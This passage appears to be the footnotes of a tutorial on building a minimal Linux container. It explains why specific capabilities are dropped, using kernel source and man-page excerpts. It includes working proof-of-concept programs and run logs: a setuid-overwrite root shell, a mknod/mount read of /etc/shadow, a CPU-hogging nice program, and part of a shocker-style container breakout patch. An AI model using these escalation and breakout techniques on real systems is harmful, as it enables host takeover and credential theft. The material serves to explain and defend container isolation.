=> trying a user namespace...writing /proc/1538/uid_map...writing /proc/1538/gid_map...done.
=> switching to uid 0 / gid 0...done.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.
[***] docker VMM-container breakout Po(C) 2014             [***]
[***] The tea from the 90's kicks your sekurity again.     [***]
[***] If you have pending sec consulting, I'll happily     [***]
[***] forward to my friends who drink secury-tea too!      [***]

<enter>

[*] Resolving 'etc/shadow'
[-] open_by_handle_at: Operation not permitted
=> cleaning cgroups...done.

Listing 35: fs/fhandle.c:166

static int handle_to_path(int mountdirfd, struct file_handle __user *ufh,
		   struct path *path)
{
	int retval = 0;
	struct file_handle f_handle;
	struct file_handle *handle = NULL;

	/*
	 * With handle we don't look at the execute bit on the
	 * the directory. Ideally we would like CAP_DAC_SEARCH.
	 * But we don't have that
	 */
	if (!capable(CAP_DAC_READ_SEARCH)) {
		retval = -EPERM;
		goto out_err;
	}
	/* ... */
}

¹⁶

The setuid executable we'll subvert:

Listing 37: harmless_setuid.c

/* -*- compile-command: "gcc -Wall -Werror harmless_setuid.c -o harmless_setuid" -*- */
#define _GNU_SOURCE
#include <unistd.h>
#include <stdio.h>

int main (int argc, char **argv)
{
	uid_t a, b, c = 0;
	getresuid(&a, &b, &c);
	printf("I'm #%d/%d/%d\n", a, b, c);
	return 0;
}

This program will write itself to the executable at argv[1]. If it's a setuid root executable, there's no user namespace, and CAP_FSETID isn't dropped, it'll retain setuid root.

Listing 38: cap_fsetid.c

/* -*- compile-command: "gcc -Wall -Werror -static cap_fsetid.c -o cap_fsetid" -*- */
#define _GNU_SOURCE
#include <unistd.h>
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>

int main (int argc, char **argv)
{
	if (argc == 2) {
		/* write our contents to the setuid file. */
		int setuid_file = 0;
		int own_file = 0;
		if ((setuid_file = open(argv[1], O_WRONLY | O_TRUNC)) == -1
		    || (own_file = open(argv[0], O_RDONLY)) == -1) {
			fprintf(stderr, "++ open failed: %m\n");
			return 1;
		}
		errno = 0;
		char here = 0;
		while (read(own_file, &here, 1) > 0
		       && write(setuid_file, &here, 1) > 0);;
		if (errno) {
			fprintf(stderr, "++ reading/writing: %m\n");
			close(setuid_file);
			close(own_file);
		}
		close(own_file);
		close(setuid_file);
	} else {
		if (setresuid(0, 0, 0)) {
			fprintf(stderr, "++ failed switching uids to root: %m\n");
			return 1;
		}
		execve("/bin/sh", (char *[]) { "sh", 0 }, NULL);
	}
	return 0;
}

Listing 39: allow_capfsetid.diff

diff --git a/linux-containers-in-500-loc/contained.c b/linux-containers-in-500-loc/contained.c
index 501aff5..17e7373 100644
--- a/linux-containers-in-500-loc/contained.c
+++ b/linux-containers-in-500-loc/contained.c
@@ -34,7 +34,6 @@ int capabilities()
 		CAP_AUDIT_WRITE,
 		CAP_BLOCK_SUSPEND,
 		CAP_DAC_READ_SEARCH,
-		CAP_FSETID,
 		CAP_IPC_LOCK,
 		CAP_MAC_ADMIN,
 		CAP_MAC_OVERRIDE,

[lizzie@empress l-c-i-500-l]$ make -B harmless_setuid
cc -Wall -Werror -static harmless_setuid.c -o harmless_setuid
[lizzie@empress l-c-i-500-l]$ sudo chown root harmless_setuid
[lizzie@empress l-c-i-500-l]$ sudo chmod 4755 harmless_setuid
[lizzie@empress l-c-i-500-l]$ ./harmless_setuid
I'm #1000/0/0
[lizzie@empress l-c-i-500-l]$ sudo ./contained -m . -u 0 -c ./cap_fsetid harmless_setuid
=> validating Linux version...4.8.4-1-ARCH on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> setting rlimit...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.qapCVs...done.
=> trying a user namespace...unsupported? continuing.
=> switching to uid 0 / gid 0...done.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.
=> cleaning cgroups...done.
[lizzie@empress l-c-i-500-l]$ ./harmless_setuid 
++ failed switching uids to root: Operation not permitted
[lizzie@empress l-c-i-500-l]$ make -B harmless_setuid
cc -Wall -Werror -static harmless_setuid.c -o harmless_setuid
[lizzie@empress l-c-i-500-l]$ sudo chown root harmless_setuid
[lizzie@empress l-c-i-500-l]$ sudo chmod 4755 harmless_setuid
[lizzie@empress l-c-i-500-l]$ sudo ./contained.allow_capfsetid -m . -u 0 -c ./cap_fsetid harmless_setuid
=> validating Linux version...4.8.4-1-ARCH on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> setting rlimit...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.4u1dNe...done.
=> trying a user namespace...unsupported? continuing.
=> switching to uid 0 / gid 0...done.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.
=> cleaning cgroups...done.
[lizzie@empress l-c-i-500-l]$ ls -lh ./harmless_setuid
-rwsr-xr-x 1 root lizzie 788K Oct 25 05:22 ./harmless_setuid
[lizzie@empress l-c-i-500-l]$ ./harmless_setuid
sh-4.3# whoami
root
sh-4.3# id
uid=0(root) gid=1000(lizzie) groups=1000(lizzie)
sh-4.3# exit
[lizzie@empress l-c-i-500-l]$ rm harmless_setuid

¹⁷

Listing 41: man 2 mlock

DESCRIPTION
	mlock(), mlock2(),  and mlockall() lock  part or all  of the
	calling process's virtual address space into RAM, preventing
	that memory from being paged to the swap area.

	munlock() and  munlockall() perform the  converse operation,
	unlocking  part  or all  of  the  calling process's  virtual
	address  space,  so  that  pages in  the  specified  virtual
	address range may once more to be swapped out if required by
	the kernel memory manager.

	Memory locking and unlocking are performed in units of whole
	pages.

ERRORS

	ENOMEM
		(Linux  2.6.9  and  later)  the caller  had  a  nonzero
		RLIMIT_MEMLOCK soft  resource limit, but tried  to lock
		more memory  than the  limit permitted.  This  limit is
		not   enforced    if   the   process    is   privileged
		(CAP_IPC_LOCK).

These functions are the only use of CAP_IPC_LOCK; the only mention in the source is

Listing 42: mm/mlock.c:27@c8d2bc

bool can_do_mlock(void)
{
	if (rlimit(RLIMIT_MEMLOCK) != 0)
		return true;
	if (capable(CAP_IPC_LOCK))
		return true;
	return false;
}

¹⁸

Listing 45: cap_mknod.c

/* -*- compile-command: "gcc -Wall -Werror -static cap_mknod.c -o cap_mknod" -*- */
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/mount.h>
#include <sys/stat.h>
#include <sys/sysmacros.h>
#define DEV "/disk"
#define MNT "/mnt"

int main (int argc, char **argv)
{
	if (argc != 4) return 1;
	int return_code = 0;
	int etc_shadow = 0;
	
	dev_t dev = makedev(atoi(argv[1]), atoi(argv[2]));
	if (mknod(DEV, S_IFBLK | S_IRUSR, dev)) {
		fprintf(stderr, "++ mknod failed: %m\n");
		return 1;
	}
	if (mkdir(MNT, S_IRUSR)
	    && (errno != EEXIST)) {
		fprintf(stderr, "++ mkdir failed: %m\n");
		goto cleanup_error;
	}
	if (mount(DEV, MNT, argv[3], 0, NULL)) {
		fprintf(stderr, "++ mount failed: %m\n");
		goto cleanup_error;
	}
	if ((etc_shadow = open(MNT "/etc/shadow", O_RDONLY)) == -1) {
		fprintf(stderr, "++ opening /etc/shadow failed: %m\n");
		goto cleanup_error;
	}
	fprintf(stderr, "++ reading /etc/shadow:\n");
	char here = 0;
	errno = 0;
	while (read(etc_shadow, &here, 1) > 0)
		write(STDOUT_FILENO, &here, 1);
	if (errno) {
		fprintf(stderr, "read loop failed! %m\n");
		goto cleanup_error;
	}
	goto cleanup;
cleanup_error:
	return_code = 1;
cleanup:
	if (etc_shadow) close(etc_shadow);
	umount(MNT);
	unlink(DEV);
	rmdir(MNT);
	return return_code;
}

Listing 46: allow_capmknod.diff

diff --git a/linux-containers-in-500-loc/contained.c b/linux-containers-in-500-loc/contained.c
index 501aff5..985930e 100644
--- a/linux-containers-in-500-loc/contained.c
+++ b/linux-containers-in-500-loc/contained.c
@@ -38,10 +38,8 @@ int capabilities()
 		CAP_IPC_LOCK,
 		CAP_MAC_ADMIN,
 		CAP_MAC_OVERRIDE,
-		CAP_MKNOD,
 		CAP_SETFCAP,
 		CAP_SYSLOG,
-		CAP_SYS_ADMIN,
 		CAP_SYS_BOOT,
 		CAP_SYS_MODULE,
 		CAP_SYS_NICE,

Note that CAP_SYS_ADMIN doesn't need to be allowed for this to work, it's just that mount is more convenient than reading the block device in userspace.

[lizzie@empress l-c-i-500-l]$  sudo  ./contained -m . -u 0 -c cap_mknod 8 1 vfat
=> validating Linux version...4.8.4-1-ARCH on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> setting rlimit...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.VTnW1G...done.
=> trying a user namespace...unsupported? continuing.
=> switching to uid 0 / gid 0...done.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.
++ mknod failed: Operation not permitted
=> cleaning cgroups...done.
[lizzie@empress l-c-i-500-l]$ make contained.allow_capmknod
patch contained.c -i allow_capmknod.diff -o contained.allow_capmknod.c
patching file contained.allow_capmknod.c (read from contained.c)
Hunk #1 succeeded at 46 (offset 8 lines).
cc -Wall -Werror -lseccomp -lcap contained.allow_capmknod.c -o contained.allow_capmknod
rm contained.allow_capmknod.c
[lizzie@empress l-c-i-500-l]$  sudo  ./contained.allow_capmknod -m . -u 0 -c cap_mknod 8 1 vfat
=> validating Linux version...4.8.4-1-ARCH on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> setting rlimit...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.fdbi8q...done.
=> trying a user namespace...unsupported? continuing.
=> switching to uid 0 / gid 0...done.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.
++ reading /etc/shadow:
[redacted]
=> cleaning cgroups...done.

¹⁹

Listing 48: setfcap_and_exec.c

/* -*- compile-command: "gcc -Wall -Werror setfcap_and_exec.c -o setfcap_and_exec  -static -lcap" -*- */
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <linux/capability.h>
#include <sys/capability.h>
#include <sys/prctl.h>
#include <sys/types.h>

int main (int argc, char  **argv)
{
	if (argc == 2 && !strcmp(argv[1], "inner")) {
		cap_t self_caps = {0};
		if (!(self_caps = cap_get_proc())) {
			fprintf(stderr, "++ cap_get_proc failed: %m\n");
			return 1;
		}

		cap_flag_value_t cap_mknod_status = CAP_CLEAR;
		if (cap_get_flag(self_caps, CAP_MKNOD, CAP_PERMITTED, &cap_mknod_status)) {
			fprintf(stderr, "++ cap_get_flag failed: %m\n");
			cap_free(self_caps);
			return 1;
		}
		if (cap_mknod_status == CAP_CLEAR)
			fprintf(stderr, "!! don't have cap_mknod+p?\n");

		if (cap_set_flag(self_caps, CAP_EFFECTIVE, 1,
				 & (cap_value_t) { CAP_MKNOD }, CAP_SET)) {
			fprintf(stderr, "++ can't cap_set_flag: %m\n");
			cap_free(self_caps);
			return 1;
		}
		if (cap_set_proc(self_caps)) {
			fprintf(stderr, "++ can't cap_set_proc: %m\n");
			cap_free(self_caps);
			return 1;
		}
		cap_free(self_caps);
		fprintf(stderr, "++ have CAP_MKNOD!\n");
	} else {
		cap_t file_caps = {0};
		if (!(file_caps = cap_from_text("cap_mknod+p"))) {
			fprintf(stderr, "++ cap_from_text failed: %m\n");
			return 1;
		}
		if (cap_set_file(argv[0], file_caps)) {
			fprintf(stderr, "++ cap_set_file failed: %m\n");
			cap_free(file_caps);
			return 1;
		}
		cap_free(file_caps);

		if (execve(argv[0], (char  *[]){ argv[0], "inner", 0 }, NULL)) {
			fprintf(stderr, "++ execve failed: %m\n");
			return 1;
		}
	}
	return 0;
}

Listing 49: allow_capsetfcap.diff

diff --git a/linux-containers-in-500-loc/contained.c b/linux-containers-in-500-loc/contained.c
index 501aff5..0f3a4e2 100644
--- a/linux-containers-in-500-loc/contained.c
+++ b/linux-containers-in-500-loc/contained.c
@@ -39,7 +39,6 @@ int capabilities()
 		CAP_MAC_ADMIN,
 		CAP_MAC_OVERRIDE,
 		CAP_MKNOD,
-		CAP_SETFCAP,
 		CAP_SYSLOG,
 		CAP_SYS_ADMIN,
 		CAP_SYS_BOOT,

[lizzie@empress l-c-i-500-l]$ sudo ./contained.allow_capsetfcap -m . -u 0 -c setfcap_and_exec
=> validating Linux version...4.8.4-1-ARCH on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> setting rlimit...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.GCu2Ry...done.
=> trying a user namespace...unsupported? continuing.
=> switching to uid 0 / gid 0...done.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.
!! don't have cap_mknod+p?
++ can't cap_set_proc: Operation not permitted
=> cleaning cgroups...done.

it does work if we don't restrict CAP_MKNOD, so it does seem like processes aren't allowed to set capabilities on files that they don't have:

Listing 50: allow_capmknod_capsetfcap.diff

diff --git a/linux-containers-in-500-loc/contained.c b/linux-containers-in-500-loc/contained.c
index 501aff5..b458201 100644
--- a/linux-containers-in-500-loc/contained.c
+++ b/linux-containers-in-500-loc/contained.c
@@ -38,8 +38,6 @@ int capabilities()
 		CAP_IPC_LOCK,
 		CAP_MAC_ADMIN,
 		CAP_MAC_OVERRIDE,
-		CAP_MKNOD,
-		CAP_SETFCAP,
 		CAP_SYSLOG,
 		CAP_SYS_ADMIN,
 		CAP_SYS_BOOT,

[lizzie@empress l-c-i-500-l]$ sudo ./contained.allow_capmknod_capsetfcap -m . -u 0 -c setfcap_and_exec
=> validating Linux version...4.8.4-1-ARCH on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> setting rlimit...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.IZ1gDw...done.
=> trying a user namespace...unsupported? continuing.
=> switching to uid 0 / gid 0...done.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.
++ have CAP_MKNOD!
=> cleaning cgroups...done.

This disagrees with Brad Spengler's note in False Boundaries and Arbitrary Code Execution

CAP_SETFCAP: generic: can set full capabilities on a file, granting full capabilities upon exec

but that's 5 years old, so it may have changed.

²⁰

Listing 52: man 7 capabilities

	CAP_SYSLOG (since Linux 2.6.37)
		*  Perform   privileged   syslog(2)  operations.    See
		   syslog(2)  for   information  on   which  operations
		   require privilege.
		*  View kernel  addresses exposed  via /proc  and other
		   interfaces  when /proc/sys/kernel/kptr_restrict  has
		   the   value  1.    (See   the   discussion  of   the
		   kptr_restrict in proc(5).)

Listing 53: man 2 syslog

	SYSLOG_ACTION_READ (2)
		[...] Bytes read from the log disappear from the log
		buffer [...]

	SYSLOG_ACTION_READ_ALL (3)
		[...] The call reads the   last    len   bytes    from
		the    log   buffer (nondestructively) [...]

	SYSLOG_ACTION_READ_CLEAR (4) [...]

	SYSLOG_ACTION_CLEAR (5) [...]

	SYSLOG_ACTION_CONSOLE_OFF (6) [...]

	SYSLOG_ACTION_CONSOLE_ON (7) [...]

	SYSLOG_ACTION_CONSOLE_LEVEL (8) [...]

	SYSLOG_ACTION_SIZE_UNREAD (9) [...]

	SYSLOG_ACTION_SIZE_BUFFER (10) [...]

	All commands  except 3 and  10 require privilege.

²¹

All of the uses of CAP_SYS_BOOT:

Listing 56: kernel/reboot.c:280@c8d2bc:

SYSCALL_DEFINE4(reboot, int, magic1, int, magic2, unsigned int, cmd,
		void __user *, arg)
{
	struct pid_namespace *pid_ns = task_active_pid_ns(current);
	char buffer[256];
	int ret = 0;

	/* We only trust the superuser with rebooting the system. */
	if (!ns_capable(pid_ns->user_ns, CAP_SYS_BOOT))
		return -EPERM;

	[...]
}

Listing 57: kernel/kexec.c:187@c8d2bc:

SYSCALL_DEFINE4(kexec_load, unsigned long, entry, unsigned long, nr_segments,
		struct kexec_segment __user *, segments, unsigned long, flags)
{
	int result;

	/* We only trust the superuser with rebooting the system. */
	if (!capable(CAP_SYS_BOOT) || kexec_load_disabled)
		return -EPERM;

	[...]
}

Listing 58: kernel/kexec_file.c:256@c8d2bc:

SYSCALL_DEFINE5(kexec_file_load, int, kernel_fd, int, initrd_fd,
		unsigned long, cmdline_len, const char __user *, cmdline_ptr,
		unsigned long, flags)
{
	int ret = 0, i;
	struct kimage **dest_image, *image;

	/* We only trust the superuser with rebooting the system. */
	if (!capable(CAP_SYS_BOOT) || kexec_load_disabled)
		return -EPERM;
	[...]
}

²²

Listing 60: kernel/module.c:931@c8d2bc

SYSCALL_DEFINE2(delete_module, const char __user *, name_user,
		unsigned int, flags)
{
	struct module *mod;
	char name[MODULE_NAME_LEN];
	int ret, forced = 0;

	if (!capable(CAP_SYS_MODULE) || modules_disabled)
		return -EPERM;
	[...]
}

Listing 61: kernel/module.c:3468@c8d2bc

static int may_init_module(void)
{
	if (!capable(CAP_SYS_MODULE) || modules_disabled)
		return -EPERM;

	return 0;
}

which is called by init_module and finit_module:

Listing 62: kernel/module.c:3759@c8d2bc

SYSCALL_DEFINE3(init_module, void __user *, umod,
		unsigned long, len, const char __user *, uargs)
{
	int err;
	struct load_info info = { };

	err = may_init_module();
	if (err)
		return err;

	pr_debug("init_module: umod=%p, len=%lu, uargs=%p\n",
	       umod, len, uargs);

	err = copy_module_from_user(umod, len, &info);
	if (err)
		return err;

	return load_module(&info, uargs, 0);
}

SYSCALL_DEFINE3(finit_module, int, fd, const char __user *, uargs, int, flags)
{
	struct load_info info = { };
	loff_t size;
	void *hdr;
	int err;

	err = may_init_module();
	if (err)
		return err;

	pr_debug("finit_module: fd=%d, uargs=%p, flags=%i\n", fd, uargs, flags);

	if (flags & ~(MODULE_INIT_IGNORE_MODVERSIONS
		      |MODULE_INIT_IGNORE_VERMAGIC))
		return -EINVAL;

	err = kernel_read_file_from_fd(fd, &hdr, &size, INT_MAX,
				       READING_MODULE);
	if (err)
		return err;
	info.hdr = hdr;
	info.len = size;

	return load_module(&info, uargs, flags);
}

²³

Listing 63: kernel/kmod.c:630@c8d2bc

static int proc_cap_handler(struct ctl_table *table, int write,
			 void __user *buffer, size_t *lenp, loff_t *ppos)
{
	struct ctl_table t;
	unsigned long cap_array[_KERNEL_CAPABILITY_U32S];
	kernel_cap_t new_cap;
	int err, i;

	if (write && (!capable(CAP_SETPCAP) ||
		      !capable(CAP_SYS_MODULE)))
		return -EPERM;

	[...]
}

which is used to authorize requests to load modules.

²⁴

Listing 64: net/core/dev_ioctl.c:349@c8d2bc

/**
 *	dev_load	- load a network module
 *	@net: the applicable net namespace
 *	@name: name of interface
 *
 *	If a network interface is not present and the process has suitable
 *	privileges this function loads the module. If module loading is not
 *	available in this kernel then it becomes a nop.
 */

void dev_load(struct net *net, const char *name)
{
	struct net_device *dev;
	int no_module;

	rcu_read_lock();
	dev = dev_get_by_name_rcu(net, name);
	rcu_read_unlock();

	no_module = !dev;
	if (no_module && capable(CAP_NET_ADMIN))
		no_module = request_module("netdev-%s", name);
	if (no_module && capable(CAP_SYS_MODULE))
		request_module("%s", name);
}

This also allows processes with only CAP_NET_ADMIN to load netdev-* modules, and is run on almost every ioctl on a network device:

Listing 65: net/core/dev_ioctl.c:381@c8d2bc

/**
 *	dev_ioctl	-	network device ioctl
 *	@net: the applicable net namespace
 *	@cmd: command to issue
 *	@arg: pointer to a struct ifreq in user space
 *
 *	Issue ioctl functions to devices. This is normally called by the
 *	user space syscall interfaces but can sometimes be useful for
 *	other purposes. The return value is the return from the syscall if
 *	positive or a negative errno code on error.
 */

int dev_ioctl(struct net *net, unsigned int cmd, void __user *arg)
{
	[...]
	/*
	 *	See which interface the caller is talking about.
	 */

	switch (cmd) {
	/*
	 *	These ioctl calls:
	 *	- can be done by all.
	 *	- atomic and do not require locking.
	 *	- return a value
	 */
	case SIOCGIFFLAGS:
	case SIOCGIFMETRIC:
	case SIOCGIFMTU:
	case SIOCGIFHWADDR:
	case SIOCGIFSLAVE:
	case SIOCGIFMAP:
	case SIOCGIFINDEX:
	case SIOCGIFTXQLEN:
		dev_load(net, ifr.ifr_name);
		[...]
}

This was pretty surprising to me! I should look into this further.

²⁵

Listing 67: man 2 nice

DESCRIPTION
	nice() adds inc  to the nice value for  the calling process.
	(A  higher  nice value  means  a  low priority.)   Only  the
	superuser  may specify  a  negative  increment, or  priority
	increase.
	[...]

ERRORS

	EPERM
		The calling process attempted  to increase its priority
		by  supplying  a  negative  inc  but  has  insufficient
		privileges.  Under  Linux, the  CAP_SYS_NICE capability
		is   required.   (But   see  the   discussion  of   the
		RLIMIT_NICE resource limit in setrlimit(2).)

²⁶

We'll see how many CPU cycles this gets in a single-core virtual machine, in the host and in a container that can set low nice values:

Listing 68: busy_loop.c

/* -*- compile-command: "gcc -Wall -Werror -static busy_loop.c -o busy_loop" -*- */
#include <time.h>
#include <sys/times.h>
#include <stdio.h>

int main (int argc, char  **argv)
{
	struct timespec now = {0};
	struct timespec then = {0};
	clock_gettime(CLOCK_MONOTONIC, &then);
	do {
		clock_gettime(CLOCK_MONOTONIC, &now);
	} while ((now.tv_sec - then.tv_sec) * 5e9
		 + now.tv_nsec - then.tv_nsec < 20e9);
	/* how much cpu time did we get? */
	struct tms tms = {0};
	if (times(&tms) == -1) {
		fprintf(stderr, "++ times failed: %m\n");
		return 1;
	}
	/*  "The tms_utime field contains the CPU time spent executing
	    instructions of the calling process.  The tms_stime field contains the
	    CPU time spent in the system while executing tasks on behalf of the
	    calling process." */
	printf("ticks: %lu\n", tms.tms_utime + tms.tms_stime);
	return 0;
}

Listing 69: nice_dos.c

/* -*- compile-command: "gcc -Wall -Werror -static nice_dos.c -o nice_dos" -*- */
#include <unistd.h>
#include <stdio.h>

int main (int argc, char **argv)
{
	if (nice(-10) == -1) {
		fprintf(stderr, "++ nice failed: %m\n");
		return 1;
	}
	if (execve("./busy_loop", (char *[]) { "./busy_loop", 0 }, NULL)) {
		fprintf(stderr, "++ execve failed: %m\n");
		return 1;
	}
}

Listing 70: allow_capsysnice.diff

diff --git a/linux-containers-in-500-loc/contained.c b/linux-containers-in-500-loc/contained.c
index 501aff5..4895071 100644
--- a/linux-containers-in-500-loc/contained.c
+++ b/linux-containers-in-500-loc/contained.c
@@ -44,7 +44,6 @@ int capabilities()
 		CAP_SYS_ADMIN,
 		CAP_SYS_BOOT,
 		CAP_SYS_MODULE,
-		CAP_SYS_NICE,
 		CAP_SYS_RAWIO,
 		CAP_SYS_RESOURCE,
 		CAP_SYS_TIME,

alpine-kernel-dev:~# (./busy_loop && echo '^ uncontained one' &) && (sudo ./contained.allow_capsysnice -m . -u 0 -c ./nice_dos &)
=> validating Linux version...4.7.6.
=> setting cgroups...memory...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.elKMci...done.
=> trying a user namespace...unsupported? continuing.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.
ticks: 52
^ uncontained one
ticks: 341
=> cleaning cgroups...done.
alpine-kernel-dev:~#

²⁷

Listing 72: man 7 capabilities

	CAP_SYS_RAWIO
		* Perform I/O port operations (iopl(2) and ioperm(2));
		* access /proc/kcore;
		* employ the FIBMAP ioctl(2) operation;
		* open   devices  for   accessing  x86   model-specific
		  registers (MSRs, see msr(4))
		* update /proc/sys/vm/mmap_min_addr;
		* create memory  mappings at addresses below  the value
		  specified by /proc/sys/vm/mmap_min_addr;
		* map files in /proc/bus/pci;
		* open /dev/mem and /dev/kmem;
		* perform various SCSI device commands;
		* perform  certain operations  on hpsa(4)  and cciss(4)
		  devices;
		* perform  a  range  of device-specific  operations  on
		  other devices.

²⁸

Listing 73: man 4 mem

	/dev/mem is a character device file  that is an image of the
	main memory of  the computer.  It may be  used, for example,
	to examine (and even patch) the system.

	[...]

	It is typically created by:

		mknod -m 660 /dev/mem c 1 1
		chown root:kmem /dev/mem

	The file /dev/kmem is the  same as /dev/mem, except that the
	kernel  virtual  memory  rather   than  physical  memory  is
	accessed.  Since  Linux 2.6.26, this file  is available only
	if  the   CONFIG_DEVKMEM  kernel  configuration   option  is
	enabled.

	It is typically created by:

		mknod -m 640 /dev/kmem c 1 2
		chown root:kmem /dev/kmem

	/dev/port  is similar  to /dev/mem,  but the  I/O ports  are
	accessed.

	It is typically created by:

		mknod -m 660 /dev/port c 1 4
		chown root:kmem /dev/port

²⁹

Listing 74: man 2 ioperm

	ioperm()  sets  the  port  access permission  bits  for  the
	calling thread for num bits starting from port address from.
	If  turn_on is  nonzero, then  permission for  the specified
	bits is  enabled; otherwise it  is disabled.  If  turn_on is
	nonzero,   the    calling   thread   must    be   privileged
	(CAP_SYS_RAWIO).

Listing 75: man 2 iopl

	iopl()  changes  the  I/O  privilege level  of  the  calling
	process, as specified  by the two least  significant bits in
	level.

	This call is necessary to allow 8514-compatible X servers to
	run under  Linux.  Since these  X servers require  access to
	all 65536 I/O ports, the ioperm(2) call is not sufficient.

	In  addition  to  granting  unrestricted  I/O  port  access,
	running  at a  higher I/O  privilege level  also allows  the
	process to disable interrupts.  This will probably crash the
	system, and is not recommended.

³⁰

Listing 77: man 7 capabilities

	CAP_SYS_RESOURCE
		* Use reserved space on ext2 filesystems;
		* make ioctl(2) calls controlling ext3 journaling;
		* override disk quota limits;
		* increase resource limits (see setrlimit(2));
		* override RLIMIT_NPROC resource limit;
		* override  maximum  number   of  consoles  on  console
		  allocation;
		* override maximum number of keymaps;
		* allow more  than 64hz  interrupts from  the real-time
		  clock;
		* raise msg_qbytes  limit for a System  V message queue
		  above  the  limit   in  /proc/sys/kernel/msgmnb  (see
		  msgop(2) and msgctl(2));
		* override  the  /proc/sys/fs/pipe-size-max limit  when
		  setting the capacity of a pipe using the F_SETPIPE_SZ
		  fcntl(2) command.
		* use F_SETPIPE_SZ  to increase the capacity  of a pipe
		  above       the        limit       specified       by
		  /proc/sys/fs/pipe-max-size;
		* override  /proc/sys/fs/mqueue/queues_max  limit  when
		  creating POSIX message queues (see mq_overview(7));
		* employ prctl(2) PR_SET_MM operation;
		* set /proc/PID/oom_score_adj to a value lower than the
		  value last set by a process with CAP_SYS_RESOURCE.

³¹

Brad Spengler agreees in "False Boundaries and Arbitrary Code Execution":

No transitions known (to this author, yet): […] CAP_SYS_RESOURCE […]

³²

It turns out that you can break important things by altering the time. "Authenticated Network Time Synchronization" describes some of these:

The importance of accurate time for security. There are many examples of security mechanisms which (often implicitly) rely on having an accurate clock:

Certificate validation in TLS and other protocols. Validating a public key certificate requires confirming that the current time is within the certificate’s validity period. Performing validation with a slow or inaccurate clock may cause expired certificates to be accepted as valid. A revoked certificate may also validate if the clock is slow, since the relying party will not check for updated revocation information.

Ticket verification in Kerberos. In Kerberos, authentication tickets have a validity period, and proper verification requires an accurate clock to prevent authentication with an expired ticket.

HTTP Strict Transport Security (HSTS) policy duration. HSTS allows website administrators to protect against downgrade attacks from HTTPS to HTTP by sending a header to browsers indicating that HTTPS must be used instead of HTTP. HSTS policies specify the duration of time that HTTPS must be used. If the browser’s clock jumps ahead, the policy may expire re-allowing downgrade attacks. A related mechanism, HTTP Public Key Pinning also relies on accurate client time for security.

For clients who set their clocks using NTP, these security mechanisms (and others) can be attacked by a network-level attacker who can intercept and modify NTP traffic, such as a malicious wireless access point or an insider at an ISP. In practice, most NTP servers do not authenticate themselves to clients, so a network attacker can intercept responses and set the timestamps arbitrarily. Even if the client sends requests to multiple servers, these may all be intercepted by an upstream network device and modified to present a consistently incorrect time to a victim. Such an attack on HSTS was demonstrated by Selvi, who provided a tool to advance the clock of victims in order to expire HSTS policies. Malhotra et al. present a variety of attacks that rely on NTP being unauthenticated, further emphasizing the need for authenticated time synchronization.

³³

Listing 80: man 7 capabilities

       CAP_WAKE_ALARM (since Linux 3.0)
	      Trigger something that will wake up the system (set
	      CLOCK_REALTIME_ALARM and CLOCK_BOOTTIME_ALARM timers).

I had trouble finding more information about these, but "Waking systems from suspend" on LWN goes into more detail:

these timers are exposed to user space via the standard POSIX clocks and timers interface, using the new the CLOCK_REALTIME_ALARM clockid. The new clockid behaves identically to CLOCK_REALTIME except that timers set against the _ALARM clockid will wake the system if it is suspended.

³⁴

Brad Spengler's "False Boundaries and Arbitrary Code Execution":

CAP_DAC_OVERRIDE: generic: same bypass as CAP_DAC_READ_SEARCH, can also modify a non-suid binary executed by root to execute code with full privileges (modifying a suid root binary for you to execute would require CAP_FSETID, as the setuid bit is cleared on modification otherwise; thanks to Eric Paris). The modprobe sysctl can be modified as mentioned above to execute code with full capabilities.

and of course Sebastian Krahmer's email:

In 0.11 the problem is that the apps that run in the container have CAP_DAC_READ_SEARCH and CAP_DAC_OVERRIDE which allows the containered app to access files not just by pathname (which would be impossible due to the bind mount of the rootfs) but also by handles via open_by_handle_at().

He might mean that the combination of both of them is problematic, though, which is absolutely true: with CAP_DAC_OVERRIDE and CAP_DAC_READ_SEARCH, it's possible to modify arbitrary files:

Listing 83: shocker_write.patch

48a49,50
> char new_motd[] = "The tea from 2014 kicks your sekurity again\n";
> 
149d150
< 	char buf[0x1000];
161,163c162
< 	       "[***] forward to my friends who drink secury-tea too!      [***]\n\n<enter>\n");
< 
< 	read(0, buf, 1);
---
> 	       "[***] forward to my friends who drink secury-tea too!      [***]\n");
169c168
< 	if (find_handle(fd1, "/etc/shadow", &root_h, &h) <= 0)
---
> 	if (find_handle(fd1, "/etc/motd", &root_h, &h) <= 0)
175c174
< 	if ((fd2 = open_by_handle_at(fd1, (struct file_handle *)&h, O_RDONLY)) < 0)
---
